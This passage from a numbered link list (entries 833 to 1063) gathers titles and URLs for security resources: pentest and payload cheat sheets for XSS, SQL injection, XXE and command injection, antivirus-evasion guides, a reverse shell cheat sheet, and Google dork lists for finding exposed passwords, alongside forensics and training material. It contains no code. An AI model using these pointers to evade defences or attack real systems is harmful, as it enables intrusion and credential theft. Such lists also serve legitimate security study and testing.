exploitation):\n\n\nhttps://blog.ropnop.com/transferring-files-from-kali-to-windows/\n\n\n-834-The Ultimate Penetration Testing Command Cheat Sheet for Kali Linux:\n\n\nhttps://www.hostingland.com/.../the-ultimate-penetration-testing-command-cheat-sheet\n\n\n-835-What is penetration testing? 10 hacking tools the pros use:\n\n\nhttps://www.csoonline.com/article/.../17-penetration-testing-tools-the-pros-use.html\n\n\n-836-Best Hacking Tools List for Hackers & Security Professionals in 2019:\n\n\nhttps://gbhackers.com/hacking-tools-list/\n\n\n-837-ExploitedBunker PenTest Cheatsheet:\n\nhttps://exploitedbunker.com/articles/pentest-cheatsheet/\n\n\n-838-How to use Zarp for penetration testing:\n\n\nhttps://www.techrepublic.com/article/how-to-use-zarp-for-penetration-testing/\n\n\n-839-Wireless Penetration Testing Cheat Sheet;\n\n\nhttps://uceka.com/2014/05/12/wireless-penetration-testing-cheat-sheet/\n\n\n-840-Pentest Cheat Sheets:\n\n\nhttps://www.cheatography.com/tag/pentest/\n\n\n-841-40 Best Penetration Testing (Pen Testing) Tools in 2019:\n\n\nhttps://www.guru99.com/top-5-penetration-testing-tools.html\n\n\n-842-Metasploit Cheat Sheet:\n\n\nhttps://www.hacking.land/2019/02/metasploit-cheat-sheet.html\n\n\n-843-OSCP useful resources and tools;\n\n\nhttps://acknak.fr/en/articles/oscp-tools/\n\n\n-844-Pentest + Exploit dev Cheatsheet:\n\n\nhttps://ehackings.com/all-posts/pentest-exploit-dev-cheatsheet/\n\n\n-845-What is Penetration Testing? A Quick Guide for 2019:\n\n\nhttps://www.cloudwards.net/penetration-testing/\n\n\n-846-Recon resource:\n\n\nhttps://pentester.land/cheatsheets/2019/04/15/recon-resources.html\n\n\n-847-Network Recon Cheat Sheet:\n\n\nhttps://www.cheatography.com/coffeefueled/cheat-sheets/network-recon/\n\n\n\n\n-848-Recon Cheat Sheets:\n\n\nhttps://www.cheatography.com/tag/recon/\n\n\n-849-Penetration Testing Active Directory, Part II:\n\n\nhttps://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/\n\n\n-850-Reverse-engineering Cheat Sheets:\n\n\nhttps://www.cheatography.com/tag/reverse-engineering/\n\n\n-851-Reverse Engineering Cheat Sheet:\n\n\nhttps://www.scribd.com/doc/38163906/Reverse-Engineering-Cheat-Sheet\n\n\n-852-ATOMBOMBING: BRAND NEW CODE INJECTION FOR WINDOWS:\n\n\nhttps://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows\n\n\n-853-PROPagate:\n\n\nhttp://www.hexacorn.com/blog/2017/10/26/propagate-a-new-code-injection-trick/\n\n\n-854-Process Doppelgänging, by Tal Liberman and Eugene Kogan::\n\n\nhttps://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf\n\n\n-855-Gargoyle:\n\n\nhttps://jlospinoso.github.io/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html\n\n\n-856-GHOSTHOOK:\n\n\nhttps://www.cyberark.com/threat-research-blog/ghosthook-bypassing-patchguard-processor-trace-based-hooking/\n\n\n-857-Learn C:\n\n\nhttps://www.programiz.com/c-programming\n\n\n-858-x86 Assembly Programming Tutorial:\n\n\nhttps://www.tutorialspoint.com/assembly_programming/\n\n\n-859-Dr. Paul Carter's PC Assembly Language:\n\n\nhttp://pacman128.github.io/pcasm/\n\n\n-860-Introductory Intel x86 - Architecture, Assembly, Applications, and Alliteration:\n\n\nhttp://opensecuritytraining.info/IntroX86.html\n\n\n-861-x86 Disassembly:\n\n\nhttps://en.wikibooks.org/wiki/X86_Disassembly\n\n\n-862-use-of-dns-tunneling-for-cc-communications-malware:\n\n\nhttps://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/\n\n\n-863-Using IDAPython to Make Your Life Easier (Series)::\n\n\nhttps://researchcenter.paloaltonetworks.com/2015/12/using-idapython-to-make-your-life-easier-part-1/\n\n\n-864-NET binary analysis:\n\n\nhttps://cysinfo.com/cyber-attack-targeting-cbi-and-possibly-indian-army-officials/\n\n\n-865-detailed analysis of the BlackEnergy3 big dropper:\n\n\nhttps://cysinfo.com/blackout-memory-analysis-of-blackenergy-big-dropper/\n\n\n-866-detailed analysis of Uroburos rootkit:\n\n\nhttps://www.gdatasoftware.com/blog/2014/06/23953-analysis-of-uroburos-using-windbg\n\n\n-867-TCP/IP and tcpdump Pocket Reference Guide:\n\n\nhttps://www.sans.org/security-resources/tcpip.pdf\n\n\n-868-TCPDUMP Cheatsheet:\n\n\nhttp://packetlife.net/media/library/12/tcpdump.pdf\n\n\n-869-Scapy Cheatsheet:\n\n\nhttp://packetlife.net/media/library/36/scapy.pdf\n\n\n-870-WIRESHARK DISPLAY FILTERS:\n\n\nhttp://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf\n\n\n-871-Windows command line sheet:\n\n\nhttps://www.sans.org/security-resources/sec560/windows_command_line_sheet_v1.pdf\n\n\n-872-Metasploit cheat sheet:\n\n\nhttps://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf\n\n\n-873-IPv6 Cheatsheet:\n\n\nhttp://packetlife.net/media/library/8/IPv6.pdf\n\n\n-874-IPv4 Subnetting:\n\n\nhttp://packetlife.net/media/library/15/IPv4_Subnetting.pdf\n\n\n-875-IOS IPV4 ACCESS LISTS:\n\n\nhttp://packetlife.net/media/library/14/IOS_IPv4_Access_Lists.pdf\n\n\n-876-Common Ports List:\n\n\nhttp://packetlife.net/media/library/23/common_ports.pdf\n\n\n-877-WLAN:\n\n\nhttp://packetlife.net/media/library/4/IEEE_802.11_WLAN.pdf\n\n\n-878-VLANs Cheatsheet:\n\n\nhttp://packetlife.net/media/library/20/VLANs.pdf\n\n\n-879-VoIP Basics CheatSheet:\n\n\nhttp://packetlife.net/media/library/34/VOIP_Basics.pdf\n\n\n-880-Google hacking and defense cheat sheet:\n\n\nhttps://www.sans.org/security-resources/GoogleCheatSheet.pdf\n\n\n-881-Nmap CheatSheet:\n\n\nhttps://pen-testing.sans.org/blog/2013/10/08/nmap-cheat-sheet-1-0\n\n\n\n-882-Netcat cheat sheet:\n\n\nhttps://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf\n\n\n-883-PowerShell cheat sheet:\n\n\nhttps://blogs.sans.org/pen-testing/files/2016/05/PowerShellCheatSheet_v41.pdf\n\n\n-884-Scapy cheat sheet POCKET REFERENCE:\n\n\nhttps://blogs.sans.org/pen-testing/files/2016/04/ScapyCheatSheet_v0.2.pdf\n\n\n-885-SQL injection cheat sheet.:\n\n\nhttps://information.rapid7.com/sql-injection-cheat-sheet-download.html\n\n\n-886-Injection cheat sheet:\n\n\nhttps://information.rapid7.com/injection-non-sql-cheat-sheet-download.html\n\n\n-887-Symmetric Encryption Algorithms cheat sheet:\n\n\nhttps://www.cheatography.com/rubberdragonfarts/cheat-sheets/symmetric-encryption-algorithms/\n\n\n-888-Intrusion Discovery Cheat Sheet v2.0 for Linux:\n\n\nhttps://pen-testing.sans.org/retrieve/linux-cheat-sheet.pdf\n\n\n-889-Intrusion Discovery Cheat Sheet v2.0 for Window:\n\n\nhttps://pen-testing.sans.org/retrieve/windows-cheat-sheet.pdf\n\n\n-890-Memory Forensics Cheat Sheet v1.2:\n\n\nhttps://digital-forensics.sans.org/media/memory-forensics-cheat-sheet.pdf\n\n\n-891-CRITICAL LOG REVIEW CHECKLIST FOR SECURITY INCIDENTS G E N E R AL APPROACH:\n\n\nhttps://www.sans.org/brochure/course/log-management-in-depth/6\n\n\n-892-Evidence collection cheat sheet:\n\n\nhttps://digital-forensics.sans.org/media/evidence_collection_cheat_sheet.pdf\n\n\n-893-Hex file and regex cheat sheet v1.0:\n\n\nhttps://digital-forensics.sans.org/media/hex_file_and_regex_cheat_sheet.pdf\n\n\n-894-Rekall Memory Forensic Framework Cheat Sheet v1.2.:\n\n\nhttps://digital-forensics.sans.org/media/rekall-memory-forensics-cheatsheet.pdf\n\n\n-895-SIFT WORKSTATION Cheat Sheet v3.0.:\n\n\nhttps://digital-forensics.sans.org/media/sift_cheat_sheet.pdf\n\n\n-896-Volatility Memory Forensic Framework Cheat Sheet:\n\n\nhttps://digital-forensics.sans.org/media/volatility-memory-forensics-cheat-sheet.pdf\n\n\n-897-Hands - on Network Forensics.:\n\n\nhttps://www.first.org/resources/papers/conf2015/first_2015_-_hjelmvik-_erik_-_hands-on_network_forensics_20150604.pdf\n\n\n-898-VoIP Security Vulnerabilities.:\n\n\nhttps://www.sans.org/reading-room/whitepapers/voip/voip-security-vulnerabilities-2036\n\n\n-899-Incident Response: How to Fight Back:\n\n\nhttps://www.sans.org/reading-room/whitepapers/analyst/incident-response-fight-35342\n\n\n-900-BI-7_VoIP_Analysis_Fundamentals:\n\n\nhttps://sharkfest.wireshark.org/sharkfest.12/presentations/BI-7_VoIP_Analysis_Fundamentals.pdf\n\n\n-901-Bug Hunting Guide:\n\n\ncybertheta.blogspot.com/2018/08/bug-hunting-guide.html\n\n\n-902-Guide 001 |Getting Started in Bug Bounty Hunting:\n\n\nhttps://whoami.securitybreached.org/2019/.../guide-getting-started-in-bug-bounty-hun...\n\n\n-903-SQL injection cheat sheet :\n\n\nhttps://portswigger.net › Web Security Academy › SQL injection › Cheat sheet\n\n\n-904-RSnake's XSS Cheat Sheet:\n\n\nhttps://www.in-secure.org/2018/08/22/rsnakes-xss-cheat-sheet/\n\n\n-905-Bug Bounty Tips (2):\n\n\nhttps://ctrsec.io/index.php/2019/03/20/bug-bounty-tips-2/\n\n\n-906-A Review of my Bug Hunting Journey:\n\n\nhttps://kongwenbin.com/a-review-of-my-bug-hunting-journey/\n\n\n-907-Meet the First Hacker Millionaire on HackerOne:\n\n\nhttps://itblogr.com/meet-the-first-hacker-millionaire-on-hackerone/\n\n\n-908-XSS Cheat Sheet:\n\n\nhttps://www.reddit.com/r/programming/comments/4sn54s/xss_cheat_sheet/\n\n\n-909-Bug Bounty Hunter Methodology:\n\n\nhttps://www.slideshare.net/bugcrowd/bug-bounty-hunter-methodology-nullcon-2016\n\n\n-910-#10 Rules of Bug Bounty:\n\n\nhttps://hackernoon.com/10-rules-of-bug-bounty-65082473ab8c\n\n\n-911-Bugbounty Checklist:\n\n\nhttps://www.excis3.be/bugbounty-checklist/21/\n\n\n-912-FireBounty | The Ultimate Bug Bounty List!:\n\n\nhttps://firebounty.com/\n\n\n-913-Brutelogic xss cheat sheet 2019:\n\n\nhttps://brutelogic.com.br/blog/ebook/xss-cheat-sheet/\n\n\n-914-XSS Cheat Sheet by Rodolfo Assis:\n\n\nhttps://leanpub.com/xss\n\n\n-915-Cross-Site-Scripting (XSS) – Cheat Sheet:\n\n\nhttps://ironhackers.es/en/cheatsheet/cross-site-scripting-xss-cheat-sheet/\n\n\n-916-XSS Cheat Sheet V. 2018 :\n\n\nhttps://hackerconnected.wordpress.com/2018/03/15/xss-cheat-sheet-v-2018/\n\n\n-917-Cross-site Scripting Payloads Cheat Sheet :\n\n\nhttps://exploit.linuxsec.org/xss-payloads-list\n\n\n-918-Xss Cheat Sheet :\n\n\nhttps://www.in-secure.org/tag/xss-cheat-sheet/\n\n\n-919-Open Redirect Cheat Sheet :\n\n\nhttps://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html\n\n\n-920-XSS, SQL Injection and Fuzzing Bar Code Cheat Sheet:\n\n\nhttps://www.irongeek.com/xss-sql-injection-fuzzing-barcode-generator.php\n\n\n-921-XSS Cheat Sheet:\n\n\nhttps://tools.paco.bg/13/\n\n\n-922-XSS for ASP.net developers:\n\n\nhttps://www.gosecure.net/blog/2016/03/22/xss-for-asp-net-developers\n\n\n-923-Cross-Site Request Forgery Cheat Sheet:\n\n\nhttps://trustfoundry.net/cross-site-request-forgery-cheat-sheet/\n\n\n-924-CSRF Attacks: Anatomy, Prevention, and XSRF Tokens:\n\n\nhttps://www.acunetix.com/websitesecurity/csrf-attacks/\n\n\n-925-Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet :\n\n\nhttps://mamchenkov.net/.../05/.../cross-site-request-forgery-csrf-prevention-cheat-shee...\n\n\n-926-Guide to CSRF (Cross-Site Request Forgery):\n\n\nhttps://www.veracode.com/security/csrf\n\n\n-927-Cross-site Request Forgery - Exploitation & Prevention:\n\n\nhttps://www.netsparker.com/blog/web-security/csrf-cross-site-request-forgery/\n\n\n-928-SQL Injection Cheat Sheet :\n\n\nhttps://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/\n\n\n-929-MySQL SQL Injection Practical Cheat Sheet:\n\n\nhttps://www.perspectiverisk.com/mysql-sql-injection-practical-cheat-sheet/\n\n\n-930-SQL Injection (SQLi) - Cheat Sheet, Attack Examples & Protection:\n\n\nhttps://www.checkmarx.com/knowledge/knowledgebase/SQLi\n\n\n-931-SQL injection attacks: A cheat sheet for business pros:\n\n\nhttps://www.techrepublic.com/.../sql-injection-attacks-a-cheat-sheet-for-business-pros/\n\n\n-932-The SQL Injection Cheat Sheet:\n\n\nhttps://biztechmagazine.com/article/.../guide-combatting-sql-injection-attacks-perfcon\n\n\n-933-SQL Injection Cheat Sheet:\n\n\nhttps://resources.infosecinstitute.com/sql-injection-cheat-sheet/\n\n\n-934-Comprehensive SQL Injection Cheat Sheet:\n\n\nhttps://www.darknet.org.uk/2007/05/comprehensive-sql-injection-cheat-sheet/\n\n\n-935-MySQL SQL Injection Cheat Sheet:\n\n\npentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet\n\n\n-936-SQL Injection Cheat Sheet: MySQL:\n\n\nhttps://www.gracefulsecurity.com/sql-injection-cheat-sheet-mysql/\n\n\n-937- MySQL Injection Cheat Sheet:\n\n\nhttps://www.asafety.fr/mysql-injection-cheat-sheet/\n\n\n-938-SQL Injection Cheat Sheet:\n\n\nhttps://www.reddit.com/r/netsec/comments/7l449h/sql_injection_cheat_sheet/\n\n\n-939-Google dorks cheat sheet 2019:\n\n\nhttps://sanfrantokyo.com/pph5/yxo7.php?xxx=5&lf338=google...cheat-sheet-2019\n\n\n-940-Command Injection Cheatsheet :\n\n\nhttps://hackersonlineclub.com/command-injection-cheatsheet/\n\n\n-941-OS Command Injection Vulnerability:\n\n\nhttps://www.immuniweb.com/vulnerability/os-command-injection.html\n\n\n-942-OS Command Injection:\n\n\nhttps://www.checkmarx.com/knowledge/knowledgebase/OS-Command_Injection\n\n\n-943-Command Injection: The Good, the Bad and the Blind:\n\n\nhttps://www.gracefulsecurity.com/command-injection-the-good-the-bad-and-the-blind/\n\n\n-944-OS command injection:\n\n\nhttps://portswigger.net › Web Security Academy › OS command injection\n\n\n-945-How to Test for Command Injection:\n\n\nhttps://blog.securityinnovation.com/blog/.../how-to-test-for-command-injection.html\n\n\n-946-Data Exfiltration via Blind OS Command Injection:\n\n\nhttps://www.contextis.com/en/blog/data-exfiltration-via-blind-os-command-injection\n\n\n-947-XXE Cheatsheet:\n\n\nhttps://www.gracefulsecurity.com/xxe-cheatsheet/\n\n\n-948-bugbounty-cheatsheet/xxe.:\n\n\nhttps://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xxe.md\n\n\n-949-XXE - Information Security:\n\n\nhttps://phonexicum.github.io/infosec/xxe.html\n\n\n-950-XXE Cheat Sheet:\n\n\nhttps://www.hahwul.com/p/xxe-cheat-sheet.html\n\n\n-951-Advice From A Researcher: Hunting XXE For Fun and Profit:\n\n\nhttps://www.bugcrowd.com/blog/advice-from-a-bug-hunter-xxe/\n\n\n-952-Out of Band Exploitation (OOB) CheatSheet :\n\n\nhttps://www.notsosecure.com/oob-exploitation-cheatsheet/\n\n\n-953-Web app penentration testing checklist and cheatsheet:\n\n\nwww.malwrforensics.com/.../web-app-penentration-testing-checklist-and-cheatsheet-with-example\n\n\n\n-954-Useful Resources:\n\n\nhttps://lsdsecurity.com/useful-resources/\n\n\n-955-Exploiting XXE Vulnerabilities in IIS/.NET:\n\n\nhttps://pen-testing.sans.org/.../entity-inception-exploiting-iis-net-with-xxe-vulnerabiliti...\n\n\n-956-Top 65 OWASP Cheat Sheet Collections - ALL IN ONE:\n\n\nhttps://www.yeahhub.com/top-65-owasp-cheat-sheet-collections-all-in-one/\n\n\n-957-Hacking Resources:\n\n\nhttps://www.torontowebsitedeveloper.com/hacking-resources\n\n\n-958-Out of Band XML External Entity Injection:\n\n\nhttps://www.netsparker.com/web...scanner/.../out-of-band-xml-external-entity-injectio...\n\n\n-959-XXE - ZeroSec - Adventures In Information Security:\n\n\nhttps://blog.zsec.uk/out-of-band-xxe-2/\n\n\n-960-Blog - Automated Data Exfiltration with XXE:\n\n\nhttps://blog.gdssecurity.com/labs/2015/4/.../automated-data-exfiltration-with-xxe.html\n\n\n-961-My Experience during Infosec Interviews:\n\n\nhttps://medium.com/.../my-experience-during-infosec-interviews-ed1f74ce41b8\n\n\n-962-Top 10 Security Risks on the Web (OWASP):\n\n\nhttps://sensedia.com/.../top-10-security-risks-on-the-web-owasp-and-how-to-mitigate-t...\n\n\n-963-Antivirus Evasion Tools [Updated 2019] :\n\n\nhttps://resources.infosecinstitute.com/antivirus-evasion-tools/\n\n\n-964-Adventures in Anti-Virus Evasion:\n\n\nhttps://www.gracefulsecurity.com/anti-virus-evasion/\n\n\n-965-Antivirus Bypass Phantom Evasion - 2019 :\n\n\nhttps://www.reddit.com/r/Kalilinux/.../antivirus_bypass_phantom_evasion_2019/\n\n\n-966-Antivirus Evasion with Python:\n\n\nhttps://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1\n\n\n-967-Windows oneliners to get shell:\n\n\nhttps://ironhackers.es/en/cheatsheet/comandos-en-windows-para-obtener-shell/\n\n\n-968-Does Veil Evasion Still Work Against Modern AntiVirus?:\n\n\nhttps://www.hackingloops.com/veil-evasion-virustotal/\n\n\n-969-Google dorks cheat sheet 2019 :\n\n\nhttps://sanfrantokyo.com/pph5/yxo7.php?xxx=5&lf338=google...cheat-sheet-2019\n\n\n-970-Malware Evasion Techniques :\n\n\nhttps://www.slideshare.net/ThomasRoccia/malware-evasion-techniques\n\n\n-971-How to become a cybersecurity pro: A cheat sheet:\n\n\nhttps://www.techrepublic.com/article/cheat-sheet-how-to-become-a-cybersecurity-pro/\n\n\n-972-Bypassing Antivirus With Ten Lines of Code:\n\n\nhttps://hackingandsecurity.blogspot.com/.../bypassing-antivirus-with-ten-lines-of.html\n\n\n-973-Bypassing antivirus detection on a PDF exploit:\n\n\nhttps://www.digital.security/en/blog/bypassing-antivirus-detection-pdf-exploit\n\n\n-974-Generating Payloads & Anti-Virus Bypass Methods:\n\n\nhttps://uceka.com/2014/02/19/generating-payloads-anti-virus-bypass-methods/\n\n\n-975-Apkwash Android Antivirus Evasion For Msfvemon:\n\n\nhttps://hackingarise.com/apkwash-android-antivirus-evasion-for-msfvemon/\n\n\n-976-Penetration Testing with Windows Computer & Bypassing an Antivirus:\n\n\nhttps://www.prodefence.org/penetration-testing-with-windows-computer-bypassing-antivirus\n\n\n-978-Penetration Testing: The Quest For Fully UnDetectable Malware:\n\n\nhttps://www.foregenix.com/.../penetration-testing-the-quest-for-fully-undetectable-malware\n\n\n-979-AVET: An AntiVirus Bypassing tool working with Metasploit Framework :\n\n\nhttps://githacktools.blogspot.com \n\n\n-980-Creating an undetectable payload using Veil-Evasion Toolkit:\n\n\nhttps://www.yeahhub.com/creating-undetectable-payload-using-veil-evasion-toolkit/\n\n\n-981-Evading Antivirus :\n\n\nhttps://sathisharthars.com/tag/evading-antivirus/\n\n\n-982-AVPASS – All things in moderation:\n\n\nhttps://hydrasky.com/mobile-security/avpass/\n\n\n-983-Complete Penetration Testing & Hacking Tools List:\n\n\nhttps://cybarrior.com/blog/2019/03/31/hacking-tools-list/\n\n\n\n-984-Modern red teaming: 21 resources for your security team:\n\n\nhttps://techbeacon.com/security/modern-red-teaming-21-resources-your-security-team\n\n\n-985-BloodHound and CypherDog Cheatsheet :\n\n\nhttps://hausec.com/2019/04/15/bloodhound-and-cypherdog-cheatsheet/\n\n\n\n-986-Redteam Archives:\n\n\nhttps://ethicalhackingguru.com/category/redteam/\n\n\n-987-NMAP Commands Cheat Sheet:\n\n\nhttps://www.networkstraining.com/nmap-commands-cheat-sheet/\n\n\n-988-Nmap Cheat Sheet:\n\n\nhttps://dhound.io/blog/nmap-cheatsheet\n\n\n-989-Nmap Cheat Sheet: From Discovery to Exploits:\n\n\nhttps://resources.infosecinstitute.com/nmap-cheat-sheet/\n\n\n-990-Nmap Cheat Sheet and Pro Tips:\n\n\nhttps://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/\n\n\n-991-Nmap Tutorial: from the Basics to Advanced Tips:\n\n\nhttps://hackertarget.com/nmap-tutorial/\n\n\n-992-How to run a complete network scan with OpenVAS;\n\n\nhttps://www.techrepublic.com/.../how-to-run-a-complete-network-scan-with-openvas/\n\n\n\n-993-Nmap: my own cheatsheet:\n\n\nhttps://www.andreafortuna.org/2018/03/12/nmap-my-own-cheatsheet/\n\n\n-994-Top 32 Nmap Command Examples For Linux Sys/Network Admins:\n\n\nhttps://www.cyberciti.biz/security/nmap-command-examples-tutorials/\n\n\n-995-35+ Best Free NMap Tutorials and Courses to Become Pro Hacker:\n\n\nhttps://www.fromdev.com/2019/01/best-free-nmap-tutorials-courses.html\n\n\n-996-Scanning Tools:\n\n\nhttps://widesecurity.net/kali-linux/kali-linux-tools-scanning/\n\n\n-997-Nmap - Cheatsheet:\n\n\nhttps://www.ivoidwarranties.tech/posts/pentesting-tuts/nmap/cheatsheet/\n\n\n-998-Linux for Network Engineers:\n\n\nhttps://netbeez.net/blog/linux-how-to-use-nmap/\n\n\n-999-Nmap Cheat Sheet:\n\n\nhttps://www.hackingloops.com/nmap-cheat-sheet-port-scanning-basics-ethical-hackers/\n\n\n-1000-Tactical Nmap for Beginner Network Reconnaissance:\n\n\nhttps://null-byte.wonderhowto.com/.../tactical-nmap-for-beginner-network-reconnaiss...\n\n\n\n-1001-A Guide For Google Hacking Database:\n\n\nhttps://www.hackgentips.com/google-hacking-database/\n\n\n-1002-2019 Data Breaches - The Worst Breaches, So Far:\n\n\nhttps://www.identityforce.com/blog/2019-data-breaches\n\n\n-1003-15 Vulnerable Sites To (Legally) Practice Your Hacking Skills:\n\n\nhttps://www.checkmarx.com/.../15-vulnerable-sites-to-legally-practice-your-hacking-skills\n\n\n\n-1004-Google Hacking Master List :\n\n\nhttps://it.toolbox.com/blogs/rmorril/google-hacking-master-list-111408\n\n\n-1005-Smart searching with googleDorking | Exposing the Invisible:\n\n\nhttps://exposingtheinvisible.org/guides/google-dorking/\n\n\n-1006-Google Dorks 2019:\n\n\nhttps://korben.info/google-dorks-2019-liste.html\n\n\n-1007-Google Dorks List and how to use it for Good;\n\n\nhttps://edgy.app/google-dorks-list\n\n\n-1008-How to Use Google to Hack(Googledorks):\n\n\nhttps://null-byte.wonderhowto.com/how-to/use-google-hack-googledorks-0163566/\n\n\n-1009-Using google as hacking tool:\n\n\nhttps://cybertechies007.blogspot.com/.../using-google-as-hacking-tool-googledorks.ht...\n\n\n-1010-#googledorks hashtag on Twitter:\n\n\nhttps://twitter.com/hashtag/googledorks\n\n\n-1011-Top Five Open Source Intelligence (OSINT) Tools:\n\n\nhttps://resources.infosecinstitute.com/top-five-open-source-intelligence-osint-tools/\n\n\n-1012-What is open-source intelligence (OSINT)?:\n\n\nhttps://www.microfocus.com/en-us/what-is/open-source-intelligence-osint\n\n\n\n-1013-A Guide to Open Source Intelligence Gathering (OSINT):\n\n\nhttps://medium.com/bugbountywriteup/a-guide-to-open-source-intelligence-gathering-osint-ca831e13f29c\n\n\n-1014-OSINT: How to find information on anyone:\n\n\nhttps://medium.com/@Peter_UXer/osint-how-to-find-information-on-anyone-5029a3c7fd56\n\n\n-1015-What is OSINT? How can I make use of it?:\n\n\nhttps://securitytrails.com/blog/what-is-osint-how-can-i-make-use-of-it\n\n\n-1016-OSINT Tools for the Dark Web:\n\n\nhttps://jakecreps.com/2019/05/16/osint-tools-for-the-dark-web/\n\n\n-1017-A Guide to Open Source Intelligence (OSINT):\n\n\nhttps://www.cjr.org/tow_center_reports/guide-to-osint-and-hostile-communities.php\n\n\n-1018-An Introduction To Open Source Intelligence (OSINT):\n\n\nhttps://www.secjuice.com/introduction-to-open-source-intelligence-osint/\n\n\n-1019-SSL & TLS HTTPS Testing [Definitive Guide] - Aptive:\n\n\nhttps://www.aptive.co.uk/blog/tls-ssl-security-testing/\n\n\n-1020-Exploit Title: [Files Containing E-mail and Associated Password Lists]:\n\n\nhttps://www.exploit-db.com/ghdb/4262/?source=ghdbid\n\n\n-1021-cheat_sheets:\n\n\nhttp://zachgrace.com/cheat_sheets/\n\n\n-1022-Intel SYSRET:\n\n\nhttps://pentestlab.blog/2017/06/14/intel-sysret\n\n\n-1023-Windows Preventive Maintenance Best Practices:\n\n\nhttp://www.professormesser.com/free-a-plus-training/220-902/windows-preventive-maintenance-best-practices/\n\n\n-1024-An Overview of Storage Devices:\n\n\nhttp://www.professormesser.com/?p=19367\n\n\n-1025-An Overview of RAID:\n\n\nhttp://www.professormesser.com/?p=19373\n\n\n-1026-How to Troubleshoot:\n\n\nhttp://www.professormesser.com/free-a-plus-training/220-902/how-to-troubleshoot/\n\n\n-1027-Mobile Device Security Troubleshooting:\n\n\nhttp://www.professormesser.com/free-a-plus-training/220-902/mobile-device-security-troubleshooting/\n\n\n-1028-Using Wireshark: Identifying Hosts and Users:\n\n\nhttps://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/\n\n\n-1029-Using Wireshark - Display Filter Expressions:\n\n\nhttps://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/\n\n\n-1030-Decrypting SSL/TLS traffic with Wireshark:\n\n\nhttps://resources.infosecinstitute.com/decrypting-ssl-tls-traffic-with-wireshark/\n\n\n-1031-A collection of handy Bash One-Liners and terminal tricks for data processing and Linux system maintenance.:\n\n\nhttps://onceupon.github.io/Bash-Oneliner/\n\n\n-1032- Bash One-Liners Explained, Part I: Working with files :\n\n\nhttps://catonmat.net/bash-one-liners-explained-part-one\n\n\n-1033-Bash One-Liners Explained, Part IV: Working with history:\n\n\nhttps://catonmat.net/bash-one-liners-explained-part-four\n\n\n-1034-Useful bash one-liners :\n\n\nhttps://github.com/stephenturner/oneliners\n\n\n-1035-Some Random One-liner Linux Commands [Part 1]:\n\n\nhttps://www.ostechnix.com/random-one-liner-linux-commands-part-1/\n\n\n-1036-The best terminal one-liners from and for smart admins + devs.:\n\n\nhttps://www.ssdnodes.com/tools/one-line-wise/\n\n\n\n-1037-Shell one-liner:\n\n\nhttps://rosettacode.org/wiki/Shell_one-liner#Racket\n\n\n-1038-SSH Cheat Sheet:\n\n\nhttp://pentestmonkey.net/tag/ssh\n\n\n\n-1039-7000 Google Dork List:\n\n\nhttps://pastebin.com/raw/Tdvi8vgK\n\n\n-1040-GOOGLE HACKİNG DATABASE – GHDB:\n\n\nhttps://pastebin.com/raw/1ndqG7aq\n\n\n-1041-STEALING PASSWORD WITH GOOGLE HACK:\n\n\nhttps://pastebin.com/raw/x6BNZ7NN\n\n\n-1042-Hack Remote PC with PHP File using PhpSploit Stealth Post-Exploitation Framework:\n\n\nhttp://www.hackingarticles.in/hack-remote-pc-with-php-file-using-phpsploit-stealth-post-exploitation-framework\n\n\n\n-1043-Open Source database of android malware:\n\n\nwww.code.google.com/archive/p/androguard/wikis/DatabaseAndroidMalwares.wiki\n\n\n-1044-big-list-of-naughty-strings:\n\n\nhttps://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt\n\n\n-1045-publicly available cap files:\n\n\nhttp://www.netresec.com/?page=PcapFiles\n\n\n-1046-“Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection”:\n\n\nhttp://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.119.399&rep=rep1&type=pdf\n\n\n-1047-Building a malware analysis toolkit:\n\n\nhttps://zeltser.com/build-malware-analysis-toolkit/\n\n\n\n-1048-Netcat Reverse Shell Cheat Sheet:\n\n\nhttp://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet\n\n\n\n-1049-Packers and crypters:\n\n\nhttp://securityblog.gr/2950/detect-packers-cryptors-and-compilers/\n\n\n\n-1050-Evading antivirus:\n\n\nhttp://www.blackhillsinfosec.com/?p=5094\n\n\n\n-1051-cheat sheets and information,The Art of Hacking:\n\n\nhttps://github.com/The-Art-of-Hacking\n\n\n-1052-Error-based SQL injection:\n\n\nhttps://www.exploit-db.com/docs/37953.pdf\n\n\n-1053-XSS cheat sheet:\n\n\nhttps://www.veracode.com/security/xss\n\n\n-1054-Active Directory Enumeration with PowerShell:\n\n\nhttps://www.exploit-db.com/docs/46990\n\n\n\n-1055-Buffer Overflows, C Programming, NSA GHIDRA and More:\n\n\nhttps://www.exploit-db.com/docs/47032\n\n\n\n-1056-Analysis of CVE-2019-0708 (BlueKeep):\n\n\nhttps://www.exploit-db.com/docs/46947\n\n\n\n-1057-Windows Privilege Escalations:\n\n\nhttps://www.exploit-db.com/docs/46131\n\n\n\n-1058-The Ultimate Guide For Subdomain Takeover with Practical:\n\n\n\nhttps://www.exploit-db.com/docs/46415\n\n\n\n-1059-File transfer skills in the red team post penetration test:\n\n\nhttps://www.exploit-db.com/docs/46515\n\n\n\n-1060-How To Exploit PHP Remotely To Bypass Filters & WAF Rules:\n\n\n\nhttps://www.exploit-db.com/docs/46049\n\n\n\n-1061-Flying under the radar:\n\n\n\nhttps://www.exploit-db.com/docs/45898\n\n\n-1062-what is google hacking? and why it is useful ?and how you can learn how to use it:\n\n\nhttps://twitter.com/cry__pto/status/1142497470825545729?s=20\n\n\n-1063-useful blogs for 